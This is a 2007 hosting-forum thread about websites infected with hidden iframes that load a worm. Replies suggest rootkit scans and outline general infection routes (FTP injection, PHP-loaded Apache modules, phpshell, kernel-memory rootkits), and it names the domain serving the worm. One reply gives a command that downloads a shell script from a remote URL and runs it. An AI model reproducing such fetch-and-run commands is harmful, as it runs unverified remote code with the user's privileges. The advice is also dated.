Posted by TigerHosting, 07-13-2007, 11:45 AM I have recently found that several of the web sites that I'm hosting on my server have worms that when you access the web sites in Internet Explorer, the antivirus is triggered. When you look an the source code there's always an iframe that loads a remote web page with a worm. Have you seen it already? How did these web sites get infected? Is there an easy way to clean them or is it the hard way? I ran a clamscan on the server and it didn't find anything
Posted by Outlaw Web Master, 07-13-2007, 11:54 AM do you have rk hunter or any other rootkit checker on your server...if you do run a scan to check for rootkits...and while your at it maybe check and update the security of your system, because it might be possible that your system needs patched. to install rk hunter login to your box and use wget http://www.coreisp.nl/rkhunter.sh sh rkhunter.sh then run a scan to be on the safe site. then iframe worms are ie exploits maybe read G http://www.google.co.uk/search?hl=en...e+Search&meta= OWM Last edited by Outlaw Web Master; 07-13-2007 at 12:05 PM.
Posted by hbhb, 07-14-2007, 01:56 AM if that happens does that mean the system is rooted?
Posted by Outlaw Web Master, 07-14-2007, 07:36 AM it doesn't mean the system is rooted at all ....but it most likely mean that the system needs patched and them worms/viruses removed. here's an explanation on how to find and remove them....obviously using "flame" as an example, you'd have 'to find the name of the ones on your server and replace the name. OWM Last edited by Outlaw Web Master; 07-14-2007 at 07:39 AM.
Posted by TigerHosting, 07-17-2007, 09:15 PM I found out. On the web site, there's a file that had this malicious code: It printed an iframe that imported a worm from a Russian web site (googlerank.info). Now how did it get there? No idea... I scanned for rootkits, for virus, nothing... The passwords are all 10+ letters, latest patches on RHEL. The server is certified "Hacker-safe" by a 3rd party organization....
Posted by Scott.Mc, 07-17-2007, 09:37 PM Let me first comment on this part, "The server is certified "Hacker-safe" by a 3rd party organization...." A nessus scan does not make you secure in the slightest, those are nothing more than marketing logos. With the newer iframe exploits most of them come via FTP (however note this is a general assumption based upon experience lately). You would have to check all logs to confirm where it came from or how it was inserted. Theres several forms, basic ones that insert into files, to the newer ones which insert themself in memory. You would be best to get a system administrator to check your server to see how, were, why and how to prevent it. -Scott
Posted by Ramprage, 07-17-2007, 10:04 PM Yep Scott's right, there are a few variations of the attacks. - FTP download/ inject code to page and upload. - Modify Apache memory through PHP like enable_DL, this is the flame.so which was posted above, one variant anyways. - Script attack such as phpshell, modify world writable pages or even database templates They're a combination of exploits an attacker uses to spread viruses/malware and infect website visitors with trojans and stuff. They first find vulnerable web servers/sites to infect and use them to help spread their garbage to the world... Rootkit detectors will not pick anything up so don't bother scanning. Since these attacks are not root hacks, we'll 99.9% they're not so scanning will generally result in nothing found.
Posted by Scott.Mc, 07-17-2007, 10:07 PM Just a FYI, I was not speaking about apache memory, flame.so is old. I was speaking about specific rootkits designed to hide in /dev/kmem. The newer ones send the iframe only once per IP aswell. Just an offtopic note that is all.